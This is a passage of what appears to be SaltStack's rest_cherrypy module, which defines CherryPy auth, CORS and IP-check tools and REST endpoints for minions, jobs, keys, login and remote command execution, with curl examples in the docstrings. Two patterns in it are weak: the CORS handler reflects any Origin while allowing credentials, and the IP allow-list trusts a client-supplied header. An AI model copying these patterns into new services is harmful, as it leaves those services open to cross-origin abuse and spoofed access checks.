logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending positional args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups'] is not False:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
